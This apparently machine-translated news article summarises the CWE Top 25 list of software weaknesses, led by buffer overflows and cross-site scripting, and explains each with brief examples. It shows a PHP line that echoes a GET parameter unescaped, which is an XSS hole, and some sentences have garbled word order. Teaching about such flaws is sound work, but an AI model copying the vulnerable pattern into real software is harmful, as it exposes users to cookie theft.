Top 25 security vulnerabilities: Buffer overflows as the greatest source of danger

The community project Common Weakness Enumeration (CWE) has published a two-year evaluation that brings together the most dangerous types of software vulnerabilities from this period. The resulting “Top 25 security vulnerabilities” shows, among other things, that memory errors in the form of buffer overflows represent one of the greatest dangers.

The CWE uses reported security gaps from the National Vulnerability Database (NVD) for its evaluations. The overall rating results from the frequency of a security gap and the possible damage.

With a bit of a head start, the so-called is in first place Out-of-bounds Write. With this variant of the buffer overflow, the software writes data before the beginning or beyond the intended end of the buffer.

The problem arises in C, for example, when a 64-byte buffer is used for an IP address char hostname[64]; provided, but the software does not prevent longer entries.

Such a buffer overflow may allow an attacker to overwrite sensitive data or determine the further course of the program.

In second place is Cross-Site Scripting (XSS) landed. XSS vulnerabilities are usually less critical than other holes in the list, but they are so common that they play along with the top. This type of vulnerability executes Javascript from unchecked input in the attack target’s browser.

The gap arises when a website inserts user-controlled values ​​directly into the source text – for example by writing content in the source text of the page from a GET parameter. In PHP, this code is vulnerable to XSS: echo '<div>'.$_GET["email"].'</div>'.

An attacker can manipulate the input in order to read the cookies from the context of the website via Javascript and forward them to themselves.

The climbed to 3rd place Out-of-bounds-Error reading data. This is another type of memory error (read access) in which you can possibly read sensitive data from the memory.

For example, if you can influence the index of an array in C / C ++, but only check whether the index is less than the maximum length, an attacker with a negative index can read potentially sensitive memory contents.

Missing authentication for critical functions rose from 24th to 11th place. This includes completely unprotected functions. In the case of “Improper Authentication” in 14th place, on the other hand, authentication is available, but implemented incorrectly.

Other vulnerabilities climbed up the list. These include, for example, “Deserialization of Untrusted Data” in 13th place, the deserialization of untrustworthy data without checking whether the result is valid. “Incorrect Default Permissions” made it from position 41 to position 19, which includes insecure file permissions such as “Index of /” folder lists on web servers.

Code injection (“Improper Control of Generation of Code”) and incorrect rights management (“Improper Privilege Management”) are no longer in the top 25, but still important to avoid.

In the descriptions of the various types of vulnerabilities, the CWE project gives both tips on how to identify existing gaps and how to prevent them. To prevent buffer overflows, the CWE project recommends using a memory-safe programming language from the outset.


To home page